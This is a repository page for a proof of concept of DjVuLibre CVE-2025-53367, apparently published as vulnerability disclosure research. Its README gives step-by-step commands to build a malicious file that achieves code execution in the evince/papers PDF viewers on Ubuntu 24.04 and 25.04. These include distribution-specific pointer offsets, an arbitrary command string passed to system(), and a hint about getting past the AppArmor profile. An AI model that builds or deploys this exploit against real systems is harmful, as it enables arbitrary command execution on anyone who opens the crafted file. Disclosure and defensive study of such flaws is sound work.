Skip to content

MMRDecoder_scanruns_CVE-2025-53367

Directory actions

More options

Directory actions

More options

Latest commit

 

History

History
 
 

MMRDecoder_scanruns_CVE-2025-53367

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
DjVuLibre-poc-CVE-2025-53367.diff
DjVuLibre-poc-CVE-2025-53367.diff
 
 
README.md
README.md
 
 
fuzzer-poc.djvu
fuzzer-poc.djvu
 
 
noble.pdf
noble.pdf
 
 
plucky.pdf
plucky.pdf
 
 

README.md

Proof of concept for DjVuLibre CVE-2025-53367

This poc uses CVE-2025-53367 to achieve code execution in the default PDF viewer on many Linux distributions: evince or papers.

Because the DjVuLibre file format is quite complicated, it was easiest to create the poc by reusing the DjVuLibre codebase, and modifying one of its tools to generate the poc file. So to build the poc, you need to clone the official DjVuLibre repo and then apply a patch:

git clone https://git.code.sf.net/p/djvu/djvulibre-git DjVuLibre-poc-CVE-2025-53367
cd DjVuLibre-poc-CVE-2025-53367
git checkout 4a285e8da5cd9a2a6b296242a952ee96e519280d
git apply ../DjVuLibre-poc-CVE-2025-53367.diff

Build it like this:

./autogen.sh --prefix=`pwd`/install
make install

Now generate the poc file like this:

./install/bin/c44 0x1010 0x4770 "google-chrome https://www.youtube.com/watch?v=dQw4w9WgXcQ" plucky.pdf  # Ubuntu 25.04
./install/bin/c44 0x1010 0x4360 "google-chrome https://www.youtube.com/watch?v=dQw4w9WgXcQ" noble.pdf   # Ubuntu 24.04

The first two parameters are offsets that need to be tuned for different Linux distributions. The first is the distance between two pointers in libdjvulibre.so and the second is the distance between two pointers in libc.so. The third parameter is the command string that will be passed to system(). Note that evince/papers run under an AppArmor profile which will block some commands. It's not super-restrictive, so there are ways of getting past it. You can use the aa-exec tool to experiment with what's possible:

aa-exec -d -v -p /usr/bin/papers /bin/bash -c "echo 1337 > ~/pwned.txt"

Original fuzzer-generated poc

We published this (much simpler) version of the poc sooner, to help people quickly test whether they're running a vulnerable version of DjVuLibre. This poc only causes the DjVuLibre library to crash.

Fuzzer-generated poc file

Links: